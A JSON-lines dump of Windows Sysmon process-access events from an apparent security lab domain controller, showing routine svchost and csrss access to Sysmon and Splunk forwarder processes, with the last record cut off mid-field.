{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0337-5F25-0000-001038CC0A00}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0337-5F25-0000-001038CC0A00}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 